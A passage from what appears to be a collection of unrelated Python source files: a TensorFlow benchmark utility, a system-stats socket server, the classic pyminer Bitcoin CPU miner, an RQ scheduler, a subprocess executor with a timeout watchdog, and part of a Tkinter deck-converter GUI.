put_ops = ... # Enqueues `batch_group_size` batches to a StagingArea
get_op = ... # Dequeues 1 batch, and does some operations on it
batch_group_size = 4
with tf.Session() as sess:
image_producer = cnn_util.ImageProducer(sess, put_op, batch_group_size)
image_producer.start()
for _ in range(100):
sess.run(get_op)
image_producer.notify_image_consumption()
```
"""
def __init__(self, sess, put_ops, batch_group_size, use_python32_barrier):
self.sess = sess
self.num_gets = 0
self.put_ops = put_ops
self.batch_group_size = batch_group_size
self.done_event = threading.Event()
if (use_python32_barrier and
sys.version_info[0] == 3 and sys.version_info[1] >= 2):
self.put_barrier = threading.Barrier(2)
else:
self.put_barrier = Barrier(2)
def _should_put(self):
return (self.num_gets + 1) % self.batch_group_size == 0
def done(self):
"""Stop the image producer."""
self.done_event.set()
self.put_barrier.abort()
self.thread.join()
def start(self):
"""Start the image producer."""
self.sess.run([self.put_ops])
self.thread = threading.Thread(target=self._loop_producer)
# Set daemon to true to allow Ctrl + C to terminate all threads.
self.thread.daemon = True
self.thread.start()
def notify_image_consumption(self):
"""Increment the counter of image_producer by 1.
This should only be called by the main thread that consumes images and runs
the model computation. One batch of images should be consumed between
calling start() and the first call to this method. Then, one batch of images
should be consumed between any two successive calls to this method.
"""
if self._should_put():
self.put_barrier.wait()
self.num_gets += 1
def _loop_producer(self):
while not self.done_event.isSet():
self.sess.run([self.put_ops])
self.put_barrier.wait()
class BaseClusterManager(object):
"""The manager for the cluster of servers running the benchmark."""
def __init__(self, params):
worker_hosts = params.worker_hosts.split(',')
ps_hosts = params.ps_hosts.split(',') if params.ps_hosts else []
cluster = {'worker': worker_hosts}
if ps_hosts:
cluster['ps'] = ps_hosts
self._cluster_spec = tf.train.ClusterSpec(cluster)
def get_target(self):
"""Returns a target to be passed to tf.Session()."""
raise NotImplementedError('get_target must be implemented by subclass')
def join_server(self):
raise NotImplementedError('join must be implemented by subclass')
def get_cluster_spec(self):
return self._cluster_spec
def num_workers(self):
return len(self._cluster_spec.job_tasks('worker'))
def num_ps(self):
if 'ps' in self._cluster_spec.jobs:
return len(self._cluster_spec.job_tasks('ps'))
else:
return 0
class GrpcClusterManager(BaseClusterManager):
"""A cluster manager for a cluster networked with gRPC."""
def __init__(self, params, config_proto):
super(GrpcClusterManager, self).__init__(params)
if params.job_name == 'controller':
self._target = 'grpc://%s' % self._cluster_spec.job_tasks('worker')[0]
else:
self._server = tf.train.Server(self._cluster_spec,
job_name=params.job_name,
task_index=params.task_index,
config=config_proto,
protocol=params.server_protocol)
self._target = self._server.target
def get_target(self):
return self._target
def join_server(self):
return self._server.join()
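# Usage sketch (not part of the original module; the host lists and job name below are
# hypothetical). Any object exposing the expected attributes works as `params`:
#
#     import argparse
#     params = argparse.Namespace(worker_hosts='10.0.0.1:2222,10.0.0.2:2222',
#                                 ps_hosts='10.0.0.3:2222',
#                                 job_name='worker', task_index=0,
#                                 server_protocol='grpc')
#     manager = GrpcClusterManager(params, tf.ConfigProto())
#     with tf.Session(target=manager.get_target()) as sess:
#         pass  # run the benchmark graph against the cluster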
|
server.py
|
import os, struct, time, json
import socket, shutil
import psutil
from threading import Thread, Lock
with open('/etc/system_monitor.json', 'r') as f:
config = json.loads(f.read())
# ===============================================
# Utility functions to enumerate disks,
# mounted file systems etc
# ===============================================
# ===============================================
def get_physical_disks():
data = os.popen('lsblk --json').read()
res = json.loads(data)
all_devices = res['blockdevices']
devices = []
for dev in all_devices:
if dev['name'][0:4] == 'nvme' or dev['name'][0:2] == 'sd':
devices.append(dev['name'])
return devices
# ===============================================
def get_smart_status(block_device_name):
# -------------------
    cmd = 'smartctl --json -H -A /dev/' + block_device_name
data = os.popen(cmd).read()
res = json.loads(data)
value = {'passed' : res['smart_status']['passed']}
if "ata_smart_attributes" in res:
result = {}
for item in res["ata_smart_attributes"]["table"]:
result[item['name']] = item['raw']['string']
value['attrs'] = result
elif "nvme_smart_health_information_log" in res:
value['attrs'] = res["nvme_smart_health_information_log"]
return value
# ===============================================
def get_file_systems():
file_systems = []
for part in psutil.disk_partitions():
if '/snap' not in part.mountpoint:
file_systems.append(part.mountpoint)
return file_systems
# ===============================================
# All of the system monitoring runs in
# independent threads so they can be updated
# at different time intervals.
# ===============================================
data_cache = {}
threadLock = Lock()
# ===============================================
def update_smart_data(check_interval):
global threadLock, data_cache
physical_disks = get_physical_disks()
while True:
print('update smart data')
output = {}
for disk in physical_disks:
output[disk] = get_smart_status(disk)
threadLock.acquire()
data_cache['smart_data'] = output
threadLock.release()
time.sleep(check_interval)
# ===============================================
def update_file_system_utilisation(check_interval):
global threadLock, data_cache
file_systems = get_file_systems()
while True:
output = {}
for file_system in file_systems:
usage = shutil.disk_usage(file_system)
output[file_system] = usage.used / usage.total
threadLock.acquire()
data_cache['disk_use'] = output
threadLock.release()
time.sleep(check_interval)
# ===============================================
def update_memory_use(check_interval):
global threadLock, data_cache
while True:
# Memory
mem = psutil.virtual_memory()
threadLock.acquire()
data_cache['memory'] = {
'available' : mem.total,
'used' : mem.used
}
threadLock.release()
time.sleep(check_interval)
# ===============================================
def update_cpu_use(check_interval):
global threadLock, data_cache
while True:
cpu_use = psutil.cpu_percent(interval=check_interval, percpu=True)
threadLock.acquire()
data_cache['cpu'] = cpu_use
threadLock.release()
# ===============================================
network_recv_last = None
network_sent_last = None
def update_network_use(check_interval):
global threadLock, data_cache, network_recv_last, network_sent_last
while True:
network = psutil.net_io_counters(pernic=False)
        if network_recv_last is None:
network_recv_last = network.bytes_recv
network_sent_last = network.bytes_sent
recv = network.bytes_recv - network_recv_last
sent = network.bytes_sent - network_sent_last
threadLock.acquire()
data_cache['network'] = {
'sent' : sent / 1024,
'recv' : recv / 1024,
}
threadLock.release()
network_recv_last = network.bytes_recv
network_sent_last = network.bytes_sent
time.sleep(check_interval)
# ===============================================
# Server connection handler
# ===============================================
pool = []
if 'smart_data' in config['check']:
pool.append(
Thread(target=update_smart_data,
args=(config['check']['smart_data'],)))
if 'file_system_utilisation' in config['check']:
pool.append(
Thread(target=update_file_system_utilisation,
args=(config['check']['file_system_utilisation'],)))
if 'memory_use' in config['check']:
pool.append(
Thread(target=update_memory_use,
args=(config['check']['memory_use'],)))
if 'cpu_use' in config['check']:
pool.append(
Thread(target=update_cpu_use,
args=(config['check']['cpu_use'],)))
if 'network_use' in config['check']:
pool.append(
Thread(target=update_network_use,
args=(config['check']['network_use'],)))
[t.start() for t in pool]
# =================================================
# =================================================
def connection_handler(c, addr):
while True:
threadLock.acquire()
data = json.dumps(data_cache).encode()
threadLock.release()
c.send(struct.pack("!i", len(data)))
c.send(data)
time.sleep(config['send_frequency'])
# =================================================
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((config['bind_address'], config['bind_port']))
s.listen(5)
while True:
c, addr = s.accept()
c.settimeout(60)
    t = Thread(target=connection_handler, args=(c, addr))
pool.append(t)
t.start()
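# Client-side sketch (not part of the original server; host and port come from the same
# config file): each frame written by connection_handler() is a 4-byte big-endian length
# prefix (struct format "!i") followed by the JSON payload, so a reader can do:
#
#     def read_frame(sock):
#         header = b''
#         while len(header) < 4:
#             header += sock.recv(4 - len(header))
#         (length,) = struct.unpack('!i', header)
#         payload = b''
#         while len(payload) < length:
#             payload += sock.recv(length - len(payload))
#         return json.loads(payload.decode())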
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file license.txt or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
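# Sketch (not part of the original script; Python 2 only, matching the rest of this
# file): bufreverse() swaps the bytes within each 32-bit word and wordreverse() reverses
# the word order, so applied together they reverse all 32 bytes of a double-SHA256
# digest. That is how work() below builds the big-endian integer compared to the target.
def digest_to_long(digest):
    return long(wordreverse(bufreverse(digest)).encode('hex'), 16)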
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 24543
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
scheduler.py
|
import logging
import os
import signal
import time
import traceback
from datetime import datetime
from multiprocessing import Process
from redis import Redis, SSLConnection
from .defaults import DEFAULT_LOGGING_DATE_FORMAT, DEFAULT_LOGGING_FORMAT
from .job import Job
from .logutils import setup_loghandlers
from .queue import Queue
from .registry import ScheduledJobRegistry
from .utils import current_timestamp, enum
SCHEDULER_KEY_TEMPLATE = 'rq:scheduler:%s'
SCHEDULER_LOCKING_KEY_TEMPLATE = 'rq:scheduler-lock:%s'
class RQScheduler(object):
# STARTED: scheduler has been started but sleeping
# WORKING: scheduler is in the midst of scheduling jobs
# STOPPED: scheduler is in stopped condition
Status = enum(
'SchedulerStatus',
STARTED='started',
WORKING='working',
STOPPED='stopped'
)
def __init__(self, queues, connection, interval=1, logging_level=logging.INFO,
date_format=DEFAULT_LOGGING_DATE_FORMAT,
log_format=DEFAULT_LOGGING_FORMAT):
self._queue_names = set(parse_names(queues))
self._acquired_locks = set()
self._scheduled_job_registries = []
self.lock_acquisition_time = None
# Copy the connection kwargs before mutating them in order to not change the arguments
# used by the current connection pool to create new connections
self._connection_kwargs = connection.connection_pool.connection_kwargs.copy()
# Redis does not accept parser_class argument which is sometimes present
# on connection_pool kwargs, for example when hiredis is used
self._connection_kwargs.pop('parser_class', None)
self._connection_class = connection.__class__ # client
connection_class = connection.connection_pool.connection_class
if issubclass(connection_class, SSLConnection):
self._connection_kwargs['ssl'] = True
self._connection = None
self.interval = interval
self._stop_requested = False
self._status = self.Status.STOPPED
self._process = None
self.log = logging.getLogger(__name__)
setup_loghandlers(
level=logging_level,
name=__name__,
log_format=log_format,
date_format=date_format,
)
@property
def connection(self):
if self._connection:
return self._connection
self._connection = self._connection_class(**self._connection_kwargs)
return self._connection
@property
def acquired_locks(self):
return self._acquired_locks
@property
def status(self):
return self._status
@property
def should_reacquire_locks(self):
"""Returns True if lock_acquisition_time is longer than 10 minutes ago"""
if self._queue_names == self.acquired_locks:
return False
if not self.lock_acquisition_time:
return True
return (datetime.now() - self.lock_acquisition_time).total_seconds() > 600
def acquire_locks(self, auto_start=False):
"""Returns names of queue it successfully acquires lock on"""
successful_locks = set()
pid = os.getpid()
self.log.info("Trying to acquire locks for %s", ", ".join(self._queue_names))
for name in self._queue_names:
if self.connection.set(self.get_locking_key(name), pid, nx=True, ex=60):
successful_locks.add(name)
# Always reset _scheduled_job_registries when acquiring locks
self._scheduled_job_registries = []
self._acquired_locks = self._acquired_locks.union(successful_locks)
self.lock_acquisition_time = datetime.now()
# If auto_start is requested and scheduler is not started,
# run self.start()
if self._acquired_locks and auto_start:
if not self._process:
self.start()
return successful_locks
def prepare_registries(self, queue_names=None):
"""Prepare scheduled job registries for use"""
self._scheduled_job_registries = []
if not queue_names:
queue_names = self._acquired_locks
for name in queue_names:
self._scheduled_job_registries.append(
ScheduledJobRegistry(name, connection=self.connection)
)
@classmethod
def get_locking_key(cls, name):
"""Returns scheduler key for a given queue name"""
return SCHEDULER_LOCKING_KEY_TEMPLATE % name
def enqueue_scheduled_jobs(self):
"""Enqueue jobs whose timestamp is in the past"""
self._status = self.Status.WORKING
if not self._scheduled_job_registries and self._acquired_locks:
self.prepare_registries()
for registry in self._scheduled_job_registries:
timestamp = current_timestamp()
# TODO: try to use Lua script to make get_jobs_to_schedule()
# and remove_jobs() atomic
job_ids = registry.get_jobs_to_schedule(timestamp)
if not job_ids:
continue
queue = Queue(registry.name, connection=self.connection)
with self.connection.pipeline() as pipeline:
jobs = Job.fetch_many(job_ids, connection=self.connection)
for job in jobs:
if job is not None:
queue.enqueue_job(job, pipeline=pipeline)
registry.remove(job, pipeline=pipeline)
pipeline.execute()
self._status = self.Status.STARTED
def _install_signal_handlers(self):
"""Installs signal handlers for handling SIGINT and SIGTERM
gracefully.
"""
signal.signal(signal.SIGINT, self.request_stop)
signal.signal(signal.SIGTERM, self.request_stop)
def request_stop(self, signum=None, frame=None):
"""Toggle self._stop_requested that's checked on every loop"""
self._stop_requested = True
def heartbeat(self):
"""Updates the TTL on scheduler keys and the locks"""
self.log.debug("Scheduler sending heartbeat to %s",
", ".join(self.acquired_locks))
if len(self._queue_names) > 1:
with self.connection.pipeline() as pipeline:
for name in self._queue_names:
key = self.get_locking_key(name)
pipeline.expire(key, self.interval + 5)
pipeline.execute()
else:
key = self.get_locking_key(next(iter(self._queue_names)))
self.connection.expire(key, self.interval + 5)
def stop(self):
self.log.info("Scheduler stopping, releasing locks for %s...",
','.join(self._queue_names))
self.release_locks()
self._status = self.Status.STOPPED
def release_locks(self):
"""Release acquired locks"""
keys = [self.get_locking_key(name) for name in self._queue_names]
self.connection.delete(*keys)
self._acquired_locks = set()
def start(self):
self._status = self.Status.STARTED
# Redis instance can't be pickled across processes so we need to
# clean this up before forking
self._connection = None
self._process = Process(target=run, args=(self,), name='Scheduler')
self._process.start()
return self._process
def work(self):
self._install_signal_handlers()
while True:
if self._stop_requested:
self.stop()
break
if self.should_reacquire_locks:
self.acquire_locks()
self.enqueue_scheduled_jobs()
self.heartbeat()
time.sleep(self.interval)
def run(scheduler):
scheduler.log.info("Scheduler for %s started with PID %s",
','.join(scheduler._queue_names), os.getpid())
try:
scheduler.work()
except: # noqa
scheduler.log.error(
'Scheduler [PID %s] raised an exception.\n%s',
os.getpid(), traceback.format_exc()
)
raise
scheduler.log.info("Scheduler with PID %s has stopped", os.getpid())
def parse_names(queues_or_names):
"""Given a list of strings or queues, returns queue names"""
names = []
for queue_or_name in queues_or_names:
if isinstance(queue_or_name, Queue):
names.append(queue_or_name.name)
else:
names.append(str(queue_or_name))
return names
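# Usage sketch (not part of the original module; the Redis connection is hypothetical):
# the scheduler takes one lock per queue, then a forked Scheduler process repeatedly
# moves due jobs from each ScheduledJobRegistry onto its queue every `interval` seconds.
#
#     scheduler = RQScheduler(['default'], connection=Redis(), interval=1)
#     scheduler.acquire_locks(auto_start=True)  # starts the process that calls work()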
|
PythonExecutor.py
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import logging
import os
import subprocess
import pprint
import threading
from threading import Thread
from Grep import Grep
import shell
import sys
import platform
import Constants
logger = logging.getLogger()
class PythonExecutor:
"""
Performs functionality for executing python scripts.
Warning: class maintains internal state. As a result, instances should not be
used as a singleton for a concurrent execution of python scripts
"""
NO_ERROR = "none"
grep = Grep()
event = threading.Event()
python_process_has_been_killed = False
def __init__(self, tmpDir, config):
self.tmpDir = tmpDir
self.config = config
pass
def run_file(self, script, script_params, tmpoutfile, tmperrfile, timeout,
tmpstructedoutfile, logger_level, override_output_files=True,
environment_vars=None):
"""
Executes the specified python file in a separate subprocess.
Method returns only when the subprocess is finished.
Params arg is a list of script parameters
Timeout meaning: how many seconds should pass before script execution
is forcibly terminated
override_output_files option defines whether stdout/stderr files will be
recreated or appended
"""
if override_output_files: # Recreate files
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
else: # Append to files
tmpout = open(tmpoutfile, 'a')
tmperr = open(tmperrfile, 'a')
# need to remove this file for the following case:
# status call 1 does not write to file; call 2 writes to file;
# call 3 does not write to file, so contents are still call 2's result
try:
os.unlink(tmpstructedoutfile)
except OSError:
pass # no error
script_params += [tmpstructedoutfile, logger_level]
pythonCommand = self.python_command(script, script_params)
logger.info("Running command " + pprint.pformat(pythonCommand))
process = self.launch_python_subprocess(pythonCommand, tmpout, tmperr,
environment_vars)
logger.debug("Launching watchdog thread")
self.event.clear()
self.python_process_has_been_killed = False
thread = Thread(target=self.python_watchdog_func, args=(process, timeout))
thread.start()
# Waiting for the process to be either finished or killed
process.communicate()
self.event.set()
thread.join()
# Building results
error = self.NO_ERROR
returncode = process.returncode
out = open(tmpoutfile, 'r').read()
error = open(tmperrfile, 'r').read()
try:
with open(tmpstructedoutfile, 'r') as fp:
structured_out = json.load(fp)
except Exception:
if os.path.exists(tmpstructedoutfile):
errMsg = 'Unable to read structured output from ' + tmpstructedoutfile
structured_out = {
'msg': errMsg
}
logger.warn(structured_out)
else:
structured_out = {}
if self.python_process_has_been_killed:
error = str(error) + "\n Python script has been killed due to timeout"
returncode = 999
result = self.condenseOutput(out, error, returncode, structured_out)
logger.info("Result: %s" % result)
return result
def launch_python_subprocess(self, command, tmpout, tmperr,
environment_vars=None):
"""
    Creates a subprocess with the given parameters. This functionality was moved to a
    separate method to make unit testing possible.
"""
close_fds = None if platform.system() == "Windows" else True
env = os.environ.copy()
if environment_vars:
for k, v in environment_vars:
logger.info("Setting env: %s to %s", k, v)
env[k] = v
return subprocess.Popen(command,
stdout=tmpout,
stderr=tmperr, close_fds=close_fds, env=env)
def isSuccessfull(self, returncode):
return not self.python_process_has_been_killed and returncode == 0
def python_command(self, script, script_params):
    # we need to manually pass the python executable on windows because sys.executable will return the service wrapper
python_binary = os.environ['PYTHON_EXE'] if 'PYTHON_EXE' in os.environ else sys.executable
python_command = [python_binary, "-S", script] + script_params
return python_command
def condenseOutput(self, stdout, stderr, retcode, structured_out):
log_lines_count = self.config.get('heartbeat', 'log_lines_count')
grep = self.grep
result = {
Constants.EXIT_CODE: retcode,
"stdout": grep.tail(stdout,
log_lines_count) if log_lines_count else stdout,
"stderr": grep.tail(stderr,
log_lines_count) if log_lines_count else stderr,
"structuredOut": structured_out
}
return result
def python_watchdog_func(self, python, timeout):
self.event.wait(timeout)
if python.returncode is None:
logger.error("Subprocess timed out and will be killed")
shell.kill_process_with_children(python.pid)
self.python_process_has_been_killed = True
pass
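# Usage sketch (not part of the original module; the paths and the config object are
# hypothetical -- config only needs to answer get('heartbeat', 'log_lines_count')):
#
#     executor = PythonExecutor('/tmp', config)
#     result = executor.run_file('/var/lib/scripts/check.py', ['START'],
#                                '/tmp/out.txt', '/tmp/err.txt', 300,
#                                '/tmp/structured.json', 'INFO')
#     exit_code = result[Constants.EXIT_CODE]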
|
flippergui.py
|
import tkinter as tk
from tkinter import filedialog
import sys
import os
import flipper
import threading
from queue import Queue
from deckconverter import queue
from PIL import ImageTk, Image
import json
class FlipperGui(tk.Frame):
def __init__(self, master=None):
super().__init__(master, padx=12, pady=3)
if getattr(sys, 'frozen', False) :
self.baseDir = os.path.dirname(sys.executable)
else:
self.baseDir = os.path.dirname(os.path.realpath(__file__))
self.loadConfig()
self.master = master
self.queue = queue.initQueue()
self.grid()
rowIndex = 0
self.logoImage = ImageTk.PhotoImage(Image.open('logo.png'))
self.logoLabel = tk.Label(self, image=self.logoImage)
self.logoLabel.grid(row=rowIndex, column=0, columnspan=5)
rowIndex += 1
self.deckNameLabel = tk.Label(self, text='Deckname')
self.deckNameLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.deckNameEntry = tk.Entry(self, width=60)
        self.deckNameEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
self.deckNameEntry.insert(0,'Deck')
rowIndex += 1
self.inputLabel = tk.Label(self, text='File or URL')
self.inputLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.inputEntry = tk.Entry(self, width=60)
self.inputEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
self.inputButton = tk.Button(self, text='Browse', command=self.openFile)
self.inputButton.grid(row=rowIndex, column=4, sticky=tk.E)
rowIndex += 1
self.outputLabel = tk.Label(self, text='Output folder (optional)')
self.outputLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.outputEntry = tk.Entry(self, width=60)
self.outputEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
self.outputEntry.insert(0,self.config['outputFolder'])
self.outputButton = tk.Button(self, text='Browse', command=self.openFolder)
self.outputButton.grid(row=rowIndex, column=4, sticky=tk.E)
rowIndex += 1
self.imgurLabel = tk.Label(self, text='ImgurID (optional)')
self.imgurLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.imgurEntry = tk.Entry(self, width=60)
self.imgurEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
if self.config['imgurId']:
self.imgurEntry.insert(0,self.config['imgurId'])
self.imgurEntry.config(state='disabled')
rowIndex += 1
self.dropboxLabel = tk.Label(self, text='Dropbox Token(optional)')
self.dropboxLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.dropboxEntry = tk.Entry(self, width=60)
self.dropboxEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
if self.config['dropboxToken']:
self.dropboxEntry.insert(0,self.config['dropboxToken'])
self.dropboxEntry.config(state='disabled')
rowIndex += 1
self.basicsLabel = tk.Label(self, text='Basic lands')
self.basicsLabel.grid(row=rowIndex, column=0, sticky=tk.W)
basicsOptions = ('guru','unstable','alpha','core','guay')
self.basicsVar = tk.StringVar()
self.basicsVar.set(self.config['basicSet'])
self.basicsMenu = tk.OptionMenu(self, self.basicsVar, *basicsOptions)
self.basicsMenu.grid(row=rowIndex, column=1, columnspan=2, sticky=tk.W)
rowIndex += 1
self.hiresVar = tk.IntVar()
self.hiresVar.set(int(self.config['hires']))
self.hiresCheckbutton = tk.Checkbutton(self, text='High Resolution', variable=self.hiresVar)
self.hiresCheckbutton.grid(row=rowIndex, column=0, sticky=tk.W)
self.hiresVar.trace('w', self.hiresVarCallback)
self.reprintsVar = tk.IntVar()
self.reprintsVar.set(int(self.config['reprints']))
self.reprintsCheckbutton = tk.Checkbutton(self, text='Reprints', variable=self.reprintsVar)
self.reprintsCheckbutton.grid(row=rowIndex, column=1, sticky=tk.W)
self.nocacheVar = tk.IntVar()
self.nocacheVar.set(int(self.config['nocache']))
self.nocacheCheckbutton = tk.Checkbutton(self, text='No cache', variable=self.nocacheVar)
self.nocacheCheckbutton.grid(row=rowIndex, column=2, sticky=tk.W)
self.imgurVar = tk.IntVar()
self.imgurVar.set(int(self.config['imgur']))
self.imgurCheckbutton = tk.Checkbutton(self, text='Imgur Upload', variable=self.imgurVar)
self.imgurCheckbutton.grid(row=rowIndex, column=3, sticky=tk.W)
self.imgurVar.trace('w', self.imgurVarCallback)
self.updateImgurEntry()
self.dropboxVar = tk.IntVar()
self.dropboxVar.set(int(self.config['dropbox']))
self.dropboxCheckbutton = tk.Checkbutton(self, text='Dropbox Upload', variable=self.dropboxVar)
self.dropboxCheckbutton.grid(row=rowIndex, column=4, sticky=tk.W)
self.dropboxVar.trace('w', self.dropboxVarCallback)
self.updateDropboxEntry()
rowIndex += 1
self.progressLabel = tk.Label(self, text='Ready')
self.progressLabel.grid(row=rowIndex, column=0, columnspan=4, sticky=tk.W)
self.generateButton = tk.Button(self, text='Generate', command=self.generate)
self.generateButton.grid(row=rowIndex, column=4, sticky=tk.E)
self.processQueue()
def processQueue(self):
while self.queue.qsize():
msg = self.queue.get(0)
if msg['type'] == 'done':
self.saveConfig()
self.enableInputs()
self.updateProgressLabel('All done!')
elif msg['type'] == 'error':
self.enableInputs()
self.updateProgressLabel(msg['text'], fg='red')
elif msg['type'] == 'message':
self.updateProgressLabel(msg['text'])
self.master.after(100, self.processQueue)
def getInitialDir(self, path):
if os.path.isfile(path):
return os.path.dirname(path)
elif os.path.isdir(path):
return path
elif os.path.expanduser('~'):
return os.path.expanduser('~')
else:
return self.baseDir
def openFile(self):
currentInput = self.inputEntry.get()
initialDir = self.getInitialDir(currentInput)
filename = filedialog.askopenfilename(initialdir=initialDir,parent=self,title='Decklist')
if filename:
self.inputEntry.delete(0, tk.END)
self.inputEntry.insert(0, filename)
def openFolder(self):
currentOutput = self.outputEntry.get()
initialDir = self.getInitialDir(currentOutput)
dirname = filedialog.askdirectory(initialdir=initialDir,parent=self,title='Output directory')
if dirname:
self.outputEntry.delete(0, tk.END)
self.outputEntry.insert(0, dirname)
def generate(self):
inputStr = self.inputEntry.get()
deckName = self.deckNameEntry.get()
outputFolder = self.outputEntry.get()
imgur = bool(self.imgurVar.get())
dropbox = bool(self.dropboxVar.get())
if len(inputStr) == 0:
self.updateProgressLabel('Must give filename or URL', fg='red')
return
if len(deckName) == 0:
self.updateProgressLabel('Must give a deckname', fg='red')
return
if len(outputFolder) and not os.path.isdir(outputFolder):
